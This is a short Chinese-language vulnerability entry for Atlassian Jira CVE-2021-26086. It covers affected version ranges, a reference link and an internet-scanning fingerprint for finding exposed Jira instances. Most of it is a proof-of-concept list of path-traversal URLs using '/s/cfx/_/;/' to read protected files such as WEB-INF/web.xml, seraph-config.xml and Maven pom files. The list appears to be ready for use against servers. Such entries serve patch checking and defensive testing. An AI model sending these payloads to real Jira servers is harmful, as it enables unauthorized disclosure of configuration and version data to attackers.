# Atlassian Jira 敏感信息泄露 CVE-2021-26086

## 漏洞描述

JIRA是Atlassian公司出品的项目与事务跟踪工具，被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。

参考链接：

- https://jira.atlassian.com/browse/JRASERVER-72695

## 漏洞影响

```
version < 8.5.14
8.6.0 ≤ version < 8.13.6
8.14.0 ≤ version < 8.16.1
```

## 网络测绘

```
app="ATLASSIAN-JIRA"
```

## 漏洞复现

poc：

```
/s/cfx/_/;/WEB-INF/web.xml
/s/cfx/_/;/WEB-INF/decorators.xml
/s/cfx/_/;/WEB-INF/classes/seraph-config.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
```